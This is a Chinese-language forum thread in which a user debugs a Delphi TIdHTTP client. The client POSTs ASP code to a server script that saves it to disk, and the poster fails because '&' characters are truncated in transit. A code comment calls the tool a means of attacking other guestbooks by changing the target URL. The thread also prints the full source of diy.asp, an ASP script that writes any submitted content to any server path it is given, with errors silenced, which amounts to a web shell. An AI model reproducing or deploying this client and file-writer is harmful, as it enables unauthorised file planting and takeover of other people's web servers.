试了很多方法都不行,下面的代码把&以后的内容自动截掉了
var
str:string;
IdHTTP: TIDHttp;
myParams:tStringList; //变量定义
ret:TStringStream;
begin
IdHTTP := TIDHttp.Create(nil);
IdHTTP.ReadTimeout := 30*1000;
IdHTTP1.Request.ContentType :='application/x-www-form-urlencoded';
IdHTTP1.HTTPOptions:=[hoForceEncodeParams];
ret:=tstringstream.Create('');
myParams:=tStringList.Create;
myParams.Add('1path='+'d:\www\1.asp');
//myParams.Add('cyfddata='+StringReplace(memo2.Text, '&', '%26', [rfReplaceAll]));
//myParams.Add('cyfddata='+TIdURI.URLEncode(memo2.Text));
//showmessage(TIdURI.URLEncode(memo2.Text));
myParams.Add('data='+memo2.Text); try
IdHTTP.Post('http://tt/xx.asp',myParams,ret); //idhttp提交post请求,如果攻击其他的留言本得更换提交地址
//showmessage(ret.DataString); //返回页面源码
//showmessage(idHttp.responsetext); //返回错误信息:http 202 ok...
//showmessage(inttostr(idHttp.responsecode)); //返回错误代码: 202
except
Memo2.Lines.Add('估计是成功了'); //发送完毕记录
end;
IdHTTP.Disconnect;
FreeAndNil(IdHTTP);
FreeAndNil(myParams);
end;
var
str:string;
IdHTTP: TIDHttp;
myParams:tStringList; //变量定义
ret:TStringStream;
begin
IdHTTP := TIDHttp.Create(nil);
IdHTTP.ReadTimeout := 30*1000;
IdHTTP1.Request.ContentType :='application/x-www-form-urlencoded';
IdHTTP1.HTTPOptions:=[hoForceEncodeParams];
ret:=tstringstream.Create('');
myParams:=tStringList.Create;
myParams.Add('1path='+'d:\www\1.asp');
//myParams.Add('cyfddata='+StringReplace(memo2.Text, '&', '%26', [rfReplaceAll]));
//myParams.Add('cyfddata='+TIdURI.URLEncode(memo2.Text));
//showmessage(TIdURI.URLEncode(memo2.Text));
myParams.Add('data='+memo2.Text); try
IdHTTP.Post('http://tt/xx.asp',myParams,ret); //idhttp提交post请求,如果攻击其他的留言本得更换提交地址
//showmessage(ret.DataString); //返回页面源码
//showmessage(idHttp.responsetext); //返回错误信息:http 202 ok...
//showmessage(inttostr(idHttp.responsecode)); //返回错误代码: 202
except
Memo2.Lines.Add('估计是成功了'); //发送完毕记录
end;
IdHTTP.Disconnect;
FreeAndNil(IdHTTP);
FreeAndNil(myParams);
end;
memo2.text := StringReplace(memo2.Text, '&', '&', [rfReplaceAll]));
改成你这句还是一样效果阿,&之后的字符被截去
<% Response.Write "<input type=text name=syfdpath value="&server.mappath("abc.asp")&" size=60>" %>
至于unicode的加解码网上很多DELPHI源码。
<% Response.Write "<input type=text name=syfdpath value="%26server.mappath("abc.asp")%26" size=60>" %>
再者你的书写方式有误,字符边界符搭不当。正确写法因该是:
<% Response.Write "<input type=text name=syfdpath value=""&" & server.mappath("abc.asp")& "&"" size=60>" %>
<% Response.Write "<input type=text name=syfdpath value='&" & server.mappath("abc.asp")& "&' size=60>" %>
是啊,但是服务器端没有把%26还原成&的阿。
边界匹配时,value=123和value="123" 都是正确的。
<% Response.Write "<input type=text name=syfdpath value="%26server.mappath
^
("abc.asp")%26" size=60>" %>
^ ^ ^
procedure TForm1.Button1Click(Sender: TObject);
var
str:string;
IdHTTP: TIDHttp;
Params:TStringList;
Ret:TStringStream;
begin
IdHTTP := TIDHttp.Create(nil);
IdHTTP.ReadTimeout := 30*1000;
IdHTTP.Host:='127.0.0.1';
IdHTTP.Request.ContentType :='application/x-www-form-urlencoded';
IdHTTP.HTTPOptions:=[];
Params:=TStringList.Create;
Params.Add('msg1=I%26You!');
Params.Add('msg2=You%26Me!');
ret:=tstringstream.Create('');
IdHTTP.Post('http://127.0.0.1/test.asp',Params,Ret);
IdHTTP.Disconnect;
FreeAndNil(IdHTTP);
FreeAndNil(params);
Ret.Position:=0;
Memo1.Lines.LoadFromStream(Ret);
Ret.Free;
end;
//以下是我的Asp测试代码
<%
Response.Write(Request("msg1"))
Response.Write(Request("msg2"))
%>
//以下是我测试结果
I&You!You&Me!
var
IdHTTP: TIDHttp;
myParams:tStringList;
ret:TStringStream;
begin
IdHTTP := TIDHttp.Create(nil);
IdHTTP.ReadTimeout := 30*1000;
ret:=tstringstream.Create('');
myParams:=tStringList.Create;
myParams.Add('a='+a);
myParams.Add('b='+form1.memo2.Text);
try
IdHTTP.Post('http://127.0.0.1/ab.asp',myParams,ret);
showmessage(ret.DataString); finally
IdHTTP.Disconnect;
FreeAndNil(IdHTTP);
FreeAndNil(myParams);
end;
end;procedure TForm1.Button1Click(Sender: TObject);
begin
makediy('a%26b');
end;//以下是我的memo2.Text
c%26d//以下是我的Asp测试代码
<%
<%Response.Write(Request("a"))%>
<%Response.Write(Request("b"))%>
%>
//以下是我测试结果
a%26bc%26d
改为
Ret.Position:=0;
form1.Memo1.Lines.LoadFromStream(ret);结果还是a%26bc%26d
我也是跟我大哥学的,呵呵!!
TStringStream.Create('我需要发送的东西');
就然后就搞定了,希望对你有帮助。
unit Unit1;interfaceuses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, IdHTTP;type
TForm1 = class(TForm)
Button1: TButton;
Memo2: TMemo;
procedure Button1Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;var
Form1: TForm1;implementation{$R *.dfm}function makediy(url: string; abspath: string):string;
var
IdHTTP: TIDHttp;
myParams:tStringList;
ret:TStringStream;
begin
Result:= '';
IdHTTP := TIDHttp.Create(nil);
IdHTTP.ReadTimeout := 30*1000;
//IdHTTP.Request.ContentType :='application/x-www-form-urlencoded';
//IdHTTP1.HTTPOptions:=[hoForceEncodeParams];
ret:=tstringstream.Create('');
myParams:=tStringList.Create;
myParams.Add('syfdpath='+abspath);
//myParams.Add('cyfddata='+StringReplace(memo2.Text, '&', #38, [rfReplaceAll]));
//myParams.Add('cyfddata='+TIdURI.URLEncode(memo2.Text));
myParams.Add('cyfddata='+'<% Response.Write "<input type=text name=syfdpath value=""&" & server.mappath("abc.asp")& "&"" size=60>" %>');
try
IdHTTP.Post(url,myParams,ret);
Result:= ret.DataString;
//showmessage(ret.DataString); //返回页面源码
//showmessage(idHttp.responsetext); //返回错误信息:http 202 ok...
//showmessage(inttostr(idHttp.responsecode)); //返回错误代码: 202
finally
IdHTTP.Disconnect;
FreeAndNil(IdHTTP);
FreeAndNil(myParams);
end;
end;procedure TForm1.Button1Click(Sender: TObject);
begin
makediy('http://127.0.0.1/diy.asp','d:\www\test.asp');
end;end.
http://127.0.0.1/diy.asp的源码:
本文件绝对的路径D:\www\diy.asp
<% dim objFSO,fdata,objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then response.write "<font color=red>save Success!</font>" %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<form method=post>
<input type=text name=syfdpath value=<%=server.mappath("ttdiy.asp")%> size=60>
<textarea name=cyfddata cols=80 rows=10 width=32></textarea>
<input type=submit value="">
</form>
运行结果:产生的test.asp内容在&字符前面被截断:
<% Response.Write "<input type=text name=syfdpath value=""
这句中用%26替代&符号 结果也不对(&显示为%26)